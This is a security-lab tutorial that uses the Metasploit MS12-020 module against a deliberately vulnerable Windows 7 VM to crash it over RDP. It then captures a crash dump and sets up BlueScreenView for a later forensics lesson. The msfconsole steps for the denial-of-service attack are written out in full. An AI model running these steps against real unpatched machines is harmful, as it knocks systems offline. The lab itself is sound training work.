ComputerSecurityStudent (CSS) [Login] [Join Now]

HOME UNIX WINDOWS SECURITY FORENSICS SHOPPING GET STARTED CONTACT US

TOOLS

|SECURITY TOOLS >> Metasploit >> Current Page |Views: 54409

(Metasploit: MS12-020)
{ Kali 1.0: RDP Windows Exploit, Set Memory Crash Dump File } Help ComputerSecurityStudent
pay for continued research,
resources & bandwidth

Section 0. Background Information

1. What is the scenario?
If a Windows Machine has not been patched with KB2671387 the it is susceptible to a Denial of
Service (DoS) attack, which a malicious perpetrator can crash the machine and render the
notorious Blue Screen of Death (BSOD). This lesson will not only illustrate the attack vector,
but we will (1) set up a memory crash dump file, (2) capture the crash dump file for later
investigation, (3) add and configure a new Virtual Hard Disk, and (5) install BlueScreenView.

2. What is the Exploit?

The Remote Desktop Protocol (RDP) implementation in Microsoft Windows XP SP2 and SP3,
Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1,
and Windows 7 Gold and SP1 does not properly process packets in memory, which allows
remote attackers to execute arbitrary code by sending crafted RDP packets triggering access to
an object that (1) was not properly initialized or (2) is deleted, aka "Remote Desktop Protocol
Vulnerability."
Reference: http://www.cvedetails.com/cve/2012-0002/

3. What is Metasploit?
The Metasploit Framework is a open source penetration tool used for developing and executing
exploit code against a remote target machine it, Metasploit frame work has the world's largest
database of public, tested exploits. In simple words, Metasploit can be used to test the
Vulnerability of computer systems in order to protect them and on the other hand it can also be
used to break into remote systems.

4. What is BlueScreenView?
BlueScreenView scans all your minidump files created during 'blue screen of death' crashes,
and displays the information about all crashes in one table. For each crash, BlueScreenView
displays the minidump filename, the date/time of the crash, the basic crash information
displayed in the blue screen (Bug Check Code and 4 parameters), and the details of the driver
or module that possibly caused the crash (filename, product name, file description, and file
version).
Reference: http://nirsoft.net/utils/blue_screen_view.html

5. Pre-Requisite Lab
1. Kali: Lesson 1: Installing Kali 1.0
2. Damn Vulnerable Windows 7: Lesson 1: How to create a Damn Vulnerable Windows
7 Machine

6. Lab Notes
In this lab we will do the following:
1. Lower Windows 7 Memory
2. Configure Complete Crash Dump File
3. Illustrate Exploit
4. Post Cleanup Windows Machine
5. Add and Configure 5 GB Virtual Hard Disk
6. Install BlueScreenView

7. Legal Disclaimer
As a condition of your use of this Web site, you warrant to computersecuritystudent.com
that you will not use this Web site for any purpose that is unlawful or that is prohibited
by these terms, conditions, and notices.
In accordance with UCC § 2-316, this product is provided with "no warranties, either
express or implied." The information contained is provided "as-is", with "no guarantee of
merchantability."
In addition, this is a teaching website that does not condone malicious behavior of any
kind.
You are on notice, that continuing and/or using this lab outside your "own" test
 environment is considered malicious and is against the law.
© 2016 No content replication of any kind is allowed without express written permission.

Section 1: Start your Windows 7 VM

1. Open VMware Player on your windows machine.
Instructions:
1. Click the Start Button
2. Type "vmware player" in the search box
3. Click on VMware Player

2. Edit Virtual Machine Settings

Instructions:
1. Click on Damn Vulnerable Windows 7
2. Click on Edit virtual machine settings

3. Configure CD/DVE(IDE)
 Instructions:
1. Select CD/DVD (IDE)
2. Click on the Use physical drive: radio button
3. Select Auto detect
Note(FYI):
1. Do not click on the OK Button

4. Configure Memory
Instructions:
1. Select Memory
2. Click on "512 MB"
Note(FYI):
Temporarily lower the amount of memory to 512 MB to limit the size of the crash dump
file that we will later analyze in a proceeding lesson.
5. Configure Network Adapter
Instructions:
1. Select Network Adapter
2. Click the radio button "NAT: Used to share the host's IP address"
3. Click the OK button
Note(FYI):
1. We will use NAT instead of bridged, because of multiple VMware Player issues with
Windows 7 not acquiring an IP Address when using a Wireless connection.
6. Start Damn Vulnerable Windows 7
Instructions:
1. Click on Damn Vulnerable Windows 7
2. Click on Play virtual machine
Section 2: Login to Windows 7
1. Select Login User
Instructions:
1. Click on Security Student
Note(FYI):
Security Student does belong to the Administrators group.

2. Login as Security Student

Instructions:
1. Supply the student password (abc123).
2. Click on the arrow
Section 3: Configure Remote Settings
1. Open System Panel
Instructions:
1. Click the Windows Start Button
2. Search for System
3. Click System

2. Open Remote Settings

Instructions:
1. Click on Remote settings

3. Configure Remote Settings (Part 1)

Instructions:
 1. Remote Assistance:
Check Allow Remote Assistance connections to this computer
2. Remote Desktop
Allow connections from computers running any version of Remote Desktop (less
secure)
3. Click the OK Button

Section 4: Configure Crash Dump

1. Open System Panel(On Damn Vulnerable Windows 7)
Instructions:
1. Click the Windows Start Button
2. Search for System
3. Click System
2. Advanced system settings
Instructions:
1. Click on Advanced system settings

3. Advanced system settings

Instructions:
1. Click on Advanced tab
2. Click the Startup and Recovery Settings Button

4. Complete memory dump

Instructions:
1. Check Write an event to the system log
2. Un-Check Automatically restart
 3. Select Complete memory dump
4. Dump file: %SystemRoot%\MEMORY.DMP
5. Check Overwrite any existing file
6. Click the OK button
7. Click the System Properties Restart Message OK Button
Note(FYI):
Step #2, We do not want the endpoint to reboot, because we will later save the Blue
Screen of Death and use the various memory addresses for our subsequent memory
investigation.

5. Restart Machine
Instructions:
1. Click the Start Button
2. Click the Arrow next to Shutdown
3. Click Restart
Section 5: Login to Windows 7
1. Select Login User
Instructions:
1. Click on Security Student
Note(FYI):
Security Student does belong to the Administrators group.

2. Switch User
Instructions:
1. Supply the student password (abc123).
2. Click on the arrow
Section 6: Verify you have a Network IP Address
1. Bring up Command Prompt
Instructions:
1. Click the Windows Start Button
2. Type cmd in the search box
3. Click on cmd

2. Record IP Address
Instructions:
1. ipconfig
2. Record your IP Address
Notes(FYI):
1. In my case, my IP Address is 192.168.121.172.
2. In your case, your IP Address will probably be different.
 3. Command History
Instructions:
1. echo "MS12_020 RDP DoS Attack"
Notes(FYI):
In the following lesson, we will use Volatility to interrogate and retrieve the command
history: (1) ipconfig and (2) echo "MS12...."

Section 7: Configure Kali Virtual Machine Settings

1. Open VMware Player on your windows machine.
Instructions:
1. Click the Start Button
2. Type "vmware player" in the search box
3. Click on VMware Player

2. Edit Virtual Machine Settings

Instructions:
1. Click on Kali
2. Edit Virtual Machine Settings
Note:
Before beginning a lesson it is necessary to check the following VM settings.
3. Configure CD/DVD
Instructions:
1. Click on CD/DVD (IDE)
2. Click on the radio button "Use physical drive:"
3. Select Auto detect
4. Configure Memory
Instructions:
1. Click on Memory
2. Click on "1 GB"
 5. Set Network Adapter
Instructions:
1. Click on Network Adapter
2. Click the radio button "NAT: Used to share the host's IP Address"
3. Click the OK Button

Section 8: Play and Login to Kali

1. Start Up Kali
Instructions:
1. Click on Kali
2. Play virtual machine
2. Supply Username
Instructions:
1. Click Other...
2. Username: root
3. Click the Log In Button
3. Supply Password
Instructions:
1. Password: <Provide you Kali root password>
2. Click the Log In Button

4. Open a Terminal Window

Instructions:
1. Click on Applications
2. Accessories --> Terminal
 5. Obtain Kali's IP Address
Instructions:
1. ifconfig
2. Record your IP Address
Note(FYI):
Command #1, Use (ifconfig) to to display Kali's IP Address.
Command #2, Record Your IP Address.
Mine is 192.168.121.170.
Your will probably be different.

Section 9: Start msfconsole

1. Make a Forensics Directory
Instructions:
1. mkdir -p /forensics/ms12_020
2. cd /forensics/ms12_020
3. script ms12_020.txt
Notes(FYI):
Command #1, Create a directory named (/forensics/ms12_020). Use the (-p) to make
the parent directory if it does not exists. The (-p) flag will also suppress errors if the
directory exists.
Command #2, Navigate to the (/forensics/ms12_020) directory.
Command #3, Use (script) to record all inputs (commands) and outputs displayed on the
terminal, which will be recorded in file (ms12_020.txt).
2. Start msfconsole
Instructions:
1. msfconsole
Note(FYI):
1. Command #1, The msfconsole provides an �all-in-one� centralized console and
allows you efficient access to virtually all of the options available in the MSF.

3. Search and Use MS12-020

Instructions:
 1. search ms12_020
2. use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
Note(FYI):
Command #1, Search Metasploit for any modules that contain the string (ms12_020).
Command #2, Use the MS12-020 Denial Of Service module for Remote Desktop (RDP).

4. Read MS12-020 Description

Instructions:
1. info
2. Read the description
Note(FYI):
Command #1, Use the (info) command to display the Module (Name, Author, Options,
Descriptions and References).
5. Search and Use MS12-020
Notes(FYI):
Replace (192.168.121.172) with Damn Vulnerable Windows 7 address obtained from
[Section 6, Step 3].
Instructions:
1. show options
2. set RHOST 192.168.121.172
3. show options
Note(FYI):
Command #1, Use (show options) to determine the module requirements. Notice that
The target RHOST address is required.
Command #2, Set RHOST to the IP Address of Damn Vulnerable Windows 7 obtained
from [Section 6, Step 3].
Command #3, Use (show options) to verified that RHOST was set.

6. Exploit RDP
Instructions:
1. exploit
2. exit
3. exit
Note(FYI):
Command #1, Use (exploit) to commence the attack.
Command #2, Exit from the msfconsole.
Command #3, Exit from script.
Section 10: Save Blue Screen of Death Screenshot
1. Save a Screenshot (On Damn Vulnerable Windows 7)
Instructions:
1. Press <Ctrl> and <Alt>
2. Press <PrtScn>
3. Paste into MS Paint
4. Save MS Paint File
Note(FYI):
It is very important you save this screen for the subsequent memory analysis lesson that
we will conduct for this particular attack vector.
 2. Shut Down Damn Vulnerable Windows 7
Instructions:
1. Player --> Power --> Shut Down Guest
2. Select Yes

Section 11: Post Clean Up and Add Virtual Hard Disk

1. Open VMware Player on your windows machine.
Instructions:
1. Click the Start Button
2. Type "vmware player" in the search box
3. Click on VMware Player

2. Edit Virtual Machine Settings

Instructions:
1. Click on Damn Vulnerable Windows 7
2. Click on Edit virtual machine settings
3. Add Hard Disk
Instructions:
1. Click the Add... button
2. Click the Hard Disk
3. Click the Next button
4. Select a Disk
Instructions:
1. Select Create a new virtual disk
2. Click the Next button
5. Select a Disk Type
Instructions:
1. Select the IDE radio button
2. Click the Next button

6. Specify Disk Capacity

Instructions:
1. Maximum disk size (GB): 5.0
2. Click on the Store virtual disk as a single file radio button
3. Click the Next button
Note(FYI):
We are creating a 5.0 GB Virtual Hard Drive for the subsequent corresponding memory
analysis lesson.
7. Specify Disk File
Instructions:
1. Disk file: FORENSICS.vmdk
2. Click the Finish button
8. Configure CD/DVE(IDE)
Instructions:
1. Select CD/DVD (IDE)
2. Click on the Use physical drive: radio button
3. Select Auto detect
Note(FYI):
Do not click on the OK Button

9. Configure Memory
Instructions:
1. Select Memory
2. Click on "1 GB"
Note(FYI):
Do not click on the OK Button
Earlier, we lowered the amount of memory to 512 MB to limit the size of the crash dump
file. Now that we have the crash dump file, we can set the memory used back to the
recommended requirement.
10. Configure Network Adapter
Instructions:
1. Select Network Adapter
2. Click the radio button "NAT: Used to share the host's IP address"
3. Click the OK button
Note(FYI):
We will use NAT instead of bridged, because of multiple VMware Player issues with
Windows 7 not acquiring an IP Address when using a Wireless connection.
11. Start Damn Vulnerable Windows 7
Instructions:
1. Click on Damn Vulnerable Windows 7
2. Click on Play virtual machine
12. Windows Error Recovery
Instructions:
1. Arrow Down to Start Windows Normally
2. Press <Enter>

Section 12: Login to Windows 7

1. Select Login User (On Damn Vulnerable Windows 7)
Instructions:
1. Click on Security Student
Note(FYI):
Security Student does belong to the Administrators group.

2. Login as Security Student

Instructions:
 1. Supply the student password (abc123).
2. Click on the arrow

3. Windows Recovery Message

Instructions:
1. Click the Cancel Button
Note(FYI):
We will investigate the unexpected shutdown in a subsequent lesson.

4. Open Command Prompt

Instructions:
1. Click the Start Button
 2. Search for command prompt
3. Click on the Command Prompt

5. Verify Crash Dump File

Instructions:
1. cd C:\Windows
2. dir MEMORY.DMP
Note(FYI):
Command #2, verify this Memory Dump file exists. Notice that file size of the
MEMORY.DMP file is 512 KB.
Section 14: Configure Hard Drive
1. Open Computer Management (On Damn Vulnerable Windows 7)
Instructions:
1. Click the Start button
2. Search for computer management
3. Click on Computer Management
Note(FYI):
Although we created a Virtual Hard Disk, we need to tell the Windows Operating System
to (1)initialize it, (2) create a simple volume, (3) label it,(4) specify the size, and (5) assign
a drive letter.

2. Initialize Disk
Instructions:
1. Click on Disk Management
2. Check Disk 1
3. Select MBR (Master Boot Record)
4. Click the OK Button
3. Create New Simple Volume...
Instructions:
1. Right Click on 5.0 GB Unallocated
2. Click on New Simple Volume...

4. New Simple Volume Wizard

Instructions:
1. Click the Next button
5. Specify Volume Size
Instructions:
1. Simple volume size in MB: 5117
2. Click the Next button

6. Assign Drive Letter or Path

Instructions:
1. Click on Assign the following drive letter radio button
2. Select drive letter Z
 3. Click the Next button

7. Format Partition
Instructions:
1. Click the Format this volume with the following settings: radio button.
2. File system: NTFS
3. Allocation unit size: Default
4. Volume label: FORENSICS
5. Check Perform a quick format
6. Click the Next button
 8. Completed New Simple Volume Wizard
Instructions:
1. Click the Finish button

Section 14: Download NirSoft BlueScreenView

1. Download BlueScreenView (On Damn Vulnerable Windows 7)
Instructions:
1. Navigate to the following Address
http://www.nirsoft.net/utils/bluescreenview.zip
2. Click the Save File radio button
3. Click the OK button
2. Choose Download Location
Instructions:
1. Navigate to Download Directory
Z:\
2. Filename: bluescreenview
3. Click the Save button

3. Open Containing Folder

 Instructions:
1. Tools --> Downloads
2. Right Click on bluescreenview.zip
3. Click on Open Containing Folder

4. Extract bluescreenview
Instructions:
1. Right Click on bluescreenview
2. Touch 7-Zip
3. Click on Extract to "bluescreenview\"
5. Open bluescreenview folder
Instructions:
1. Right Click on bluescreenview
2. Click on Open

6. Run BlueScreenView
Instructions:
1. Right Click on BlueScreenView
2. Click on Open
7. User Account Control
Instructions:
1. Click the Yes button

8. Display Blue Screen in XP Style

Instructions:
1. Option --> Lower Pane Mode --> Blue Screen in XP Style
 9. Select All Blue Screen Text
Instructions:
1. Right Click in the Blue Screen Frame
2. Click Select All

10. Copy Blue Screen Text

Instructions:
1. Right Click in the Blue Screen Frame
2. Click Copy
11. Open Notepad
Instructions:
1. Click the Start Button
2. Search for notepad
3. Click on Notepad

12. Paste Blue Screen Text

Instructions:
1. Edit --> Paste
13. Save File (Part 1)
Instructions:
1. File --> Save As...

14. Save File (Part 2)

Instructions:
1. Navigate to the following directory
Z:\bluescreenview
2. File name: rdp_ms12_020.txt
3. Click the Save Button
Note(FYI):
We will use this blue screen information for a subsequent memory analysis lesson.
Section 15: Proof of Lab
1. Open a Terminal Window (On Kali)
Instructions:
1. Click on Applications
2. Accessories --> Terminal

2. Proof of Lab
Instructions:
 1. cd /forensics/ms12_020
2. grep -i rhost ms12_020.txt
3. grep -i send ms12_020.txt
4. date
5. echo "Your Name"
Replace the string "Your Name" with your actual name.
e.g., echo "John Gray"
Note(FYI):
Command #1, Change directory to /forensics/ms12_020.
Command #2, Use the command (grep) to display only lines that contain the string
(rhost) in the script file (ms12_020.txt). Use the flag(-i) to ignore case for the string
(rhost).
Command #3, Use the command (grep) to display only lines that contain the string
(send) in the script file (ms12_020.txt). Use the flag(-i) to ignore case for the string
(send).
Proof of Lab Instructions:
1. Do a PrtScn
2. Paste into a word document
3. Upload to Moodle